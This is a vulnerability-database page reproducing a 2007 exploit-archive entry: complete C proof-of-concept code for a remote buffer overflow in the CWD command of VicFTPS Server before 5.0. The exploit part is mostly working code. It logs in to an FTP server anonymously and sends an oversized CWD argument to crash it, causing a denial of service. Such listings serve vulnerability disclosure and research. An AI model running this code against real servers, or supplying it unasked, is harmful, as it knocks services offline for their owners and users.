Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)

🗓️ 18 Feb 2007 00:00:00Reported by r0ut3rType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 24 Views

VicFTPs Server CWD Remote Buffer Overflow Vulnerability exposing a remote buffer overflow in VicFTPs Server version < 5.0's 'CWD' command, leading to a denial of service (DoS) attack

Code
/*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
                 DoS Proof of concept

            r0ut3r (writ3r [at] gmail.com)

Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.

Greets Marsu, and Timq.

Description:
Sending a long argument to CWD will cause VicFTPs Server
to overwrite memory. EIP is overwritten at 323. The POC
uses a larger buffer to overwrite exception handler,
preventing an error message.  
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 21

int s;
struct sockaddr_in sock_addr;

char recvbuf[1024];
char pwn[450];

int main(int argc, char* argv[])
{
      if (argc < 2) {
        printf("Usage: %s <ip>\n", argv[0]);
        return 1; }

      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        printf("error with socket\n");
        return 1; }

      sock_addr.sin_family = AF_INET;
      sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
      sock_addr.sin_port = htons(PORT);

      if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
        printf("unable to connect\n");
        return 1; }

      printf("[+] Connected\n");
      memset(recvbuf, '\0', 1024);
      recv(s, recvbuf, 1024, 0);

      char userbuf[50];
      printf("[+] Sending user...\n");
      memset(userbuf, '\0', 50);
      memcpy(userbuf, "USER anonymous\r\n", 18);
      if (send(s, userbuf, strlen(userbuf), 0) == -1) {
        printf("unable to send data\n");
        return 1; }

      memset(recvbuf, '\0', 1024);
      recv(s, recvbuf, 1024, 0);

      char passbuf[50];
        printf("[+] Sending pass...\n");
        memcpy(passbuf, "PASS anonymous\r\n", 18);
        if (send(s, passbuf, strlen(passbuf), 0) == -1) {
                printf("unable to send data\n");
                return 1; }
      recv(s, recvbuf, 1024, 0);

      printf("[+] Building payload. \n");
      memset(pwn, '\0', 450);
      memcpy(pwn, "CWD ", 4);
      memset(pwn+4, 'A', 400);
      memcpy(pwn+404, "\r\n", 2);

      printf("[+] Sending payload.\n");
      if (send(s, pwn, strlen(pwn), 0) == -1) {
        printf("unable to send data\n");
        return 1; }

      printf("[!] Boom! crashed?!\n");

      return 0;
}

// milw0rm.com [2007-02-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4
vicftps serverbuffer overflowremotevulnerabilitydenial of serviceproof of concept
24